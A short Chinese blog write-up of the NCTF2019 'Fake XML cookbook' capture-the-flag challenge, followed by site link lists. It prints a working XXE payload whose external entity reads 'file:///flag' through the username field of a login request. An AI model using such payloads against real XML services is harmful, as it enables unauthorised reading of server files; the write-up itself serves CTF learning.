技术栈

[NCTF2019]Fake XML cookbook1

worker..2024-08-05 0:01

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

上一篇:MySQL:数据库权限与角色
下一篇:全球汽车用18650电池市场规划预测:2030年市场规模将接近320亿元,未来六年CAGR为-1.9%
相关推荐
写代码的【黑咖啡】
13 小时前
Python中的lxml:高效XML处理库
xml·开发语言·python
spencer_tseng
2 天前
org.xml.sax.SAXParseException: cvc-complex-type.3.2.2 sql-query result-type
xml
派大鑫wink
2 天前
【Day48】MyBatis 注解开发:替代 XML 映射文件
xml·java·mybatis
sunnyday0426
3 天前
Spring Boot 日志配置详解:log4j2.xml 的完整配置指南
xml·spring boot·log4j
熊出没
3 天前
关于MyBatis Mapper 接口与 XML 映射机制的分析
xml·microsoft·mybatis
她说..
4 天前
FIND_IN_SET()方法
xml·java·spring boot
北辰当尹
4 天前
xml基础
android·xml
qqqahhh
8 天前
xml文件的动态化配置,导入
xml·spring·springboot
吴声子夜歌
8 天前
Maven——pom.xml详解
xml·java·maven
iSee857
9 天前
struts2 XML外部实体注入漏洞复现(CVE-2025-68493)
xml·安全·struts2
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Linux下V2Ray安装配置指南04Claude Code Skills 实用使用手册05UV安装并设置国内源06Open Code教程(四)| 高级配置与集成07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09BongoCat - 跨平台键盘猫动画工具10MC.JS 网页版《我的世界》 免安装中文版